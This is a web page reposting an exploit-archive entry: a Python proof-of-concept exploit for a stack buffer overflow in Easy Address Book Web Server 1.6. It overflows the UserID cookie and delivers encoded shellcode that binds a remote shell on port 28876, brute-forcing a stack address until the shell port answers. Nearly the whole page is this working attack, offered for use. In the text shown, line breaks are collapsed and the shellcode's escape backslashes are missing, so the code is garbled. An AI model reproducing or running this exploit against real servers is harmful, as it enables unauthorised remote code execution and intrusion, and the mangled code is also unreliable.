Home / exploits Easy Address Book Web Server 1.6 Buffer Overflow
Posted on 22 May 2014
#!/usr/bin/env python # Exploit Title: Easy Address Book Web Server 1.6 stack buffer overflow # Date: 19 May 2014 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.efssoft.com/web-address-book-server.html # Software Link: http://www.efssoft.com/eabws.exe # Version: 1.6 # Tested on: English version of Windows XP Professional SP2 and SP3 # # Description: # By setting UserID in the cookie to a long string, we can overwrite EDX which # allows us to control execution flow when "call dword ptr [edx+28h]" is # executed. EDX is overwritten with an address pointing to a location on the # stack which in turn points to a NOP sled leading to the shellcode. This # address on the stack is brute forced, but doesn't take long since only the # 2nd byte is always different, so the address is always 0x01??B494. # # It's similar to Easy File Sharing Web Server 6.8 exploit here. # http://www.exploit-db.com/exploits/33352/ I suspect same code reused for # their Web Server series of applications. # # Tested with Easy Address Book Web Server installed in the default location # at C:EFS SoftwareEasy Address Book Web Server # # The exploit can sometimes fail the first time, so try a few more times and # you might get a shell. import socket import struct import sys target = "172.16.229.134" port = 80 # Shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/ # Binds a shell on port 28876 # msfencode -b 'x00x20' -i w32-bind-ngs-shellcode.bin # [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1) shellcode = ( "xbbxa1x68xdex7cxddxc0xd9x74x24xf4x58x33xc9" + "xb1x36x31x58x14x83xe8xfcx03x58x10x43x9dxef" + "xb5xe7xd5x61x76x6cx9fx8dxfdx04x7cx05x6fxe0" + "xf7x67x50x7bx31xa0xdfx63x4bx23x8exfbx81x9c" + "x02xc9x8dx44x33x5ax3dxe1x0cx2bxc8x69xfbxd5" + "x7ex8axd5xd5xa8x41xacx02x7cxaax05x8dxd0x0c" + "x0bx5ax82x0dx44x48x80x5dx10xcdxf4xeax7axf0" + "x7cxecx69x81x36xcex6cx7cx9ex3fxbdx3cx94x74" + "xd0xc1x44xc0xe4x6dxacx58x21xa9xf1xebx44xc6" + "x30x2bxd2xc3x1bxb8x57x37xa5x57x68x80xb1xf6" + "xfcxa5xa5xf9xebxb0x3exfaxefx53x15x7dxd1x5a" + "x1fx76xa3x02xdbxd5x44x6axb4x4cx3axb4x48x1a" + "x8ax96x03x1bx3cx8bxa3x34x28x52x74x4bxacxdb" + "xb8xd9x43xb4x13x48x9bxeaxe9xb3x17xf2xc3xe1" + "x8ax6ax47x6bx4fx4ax0ax0fxabxb2xbfx5bx18x04" + "xf8x72x5exdcx80xb9x45x8bxdcx93xd7xf5xa6xfc" + "xd0xaex7ax51xb6x02x84x03xdcx29x3cx50xf5xe7" + "x3ex57xf9" ) for i in xrange(1,255): n = "" if i < 16: n = "0" + hex(i)[-1] else: n = hex(i)[2:] guess = "0x01" + n + "b494" # value of edx used in # "call dword ptr ds:[edx+28] # only 2nd byte changes in stack address nops = int(guess, 16) + 129 # addres sof nop sled is guess+129 bytes print "[+] Trying guess at", guess payload = struct.pack("<I", nops) # pointer to nop sled payload += "A"*76 # padding payload += struct.pack("<I", int(guess,16)) # address containing pointer to # nop sled payload += "x90"*20 # nop sled payload += shellcode # win! # craft the request buf = ( "GET /addrbook.ghp HTTP/1.1 " "User-Agent: Mozilla/4.0 " "Host:" + target + ":" + str(port) + " " "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 " "Accept-Language: en-us " "Accept-Encoding: gzip, deflate " "Referer: http://" + target + "/ " "Cookie: SESSIONID=6771; UserID=" + payload + "; PassWD=; " "Conection: Keep-Alive " ) try: # send the request and payload to the server s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s1.connect((target, port)) s1.send(buf) s1.close() except Exception,e: pass try: # check if we guessed the correct address by connecting to port 28876 s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.connect((target, 28876)) s2.close() print " [+] Success! A shell is waiting on port 28876!" sys.exit(0) except Exception,e: pass print " [!] Didn't work. Sometimes it takes a few tries, so try again."
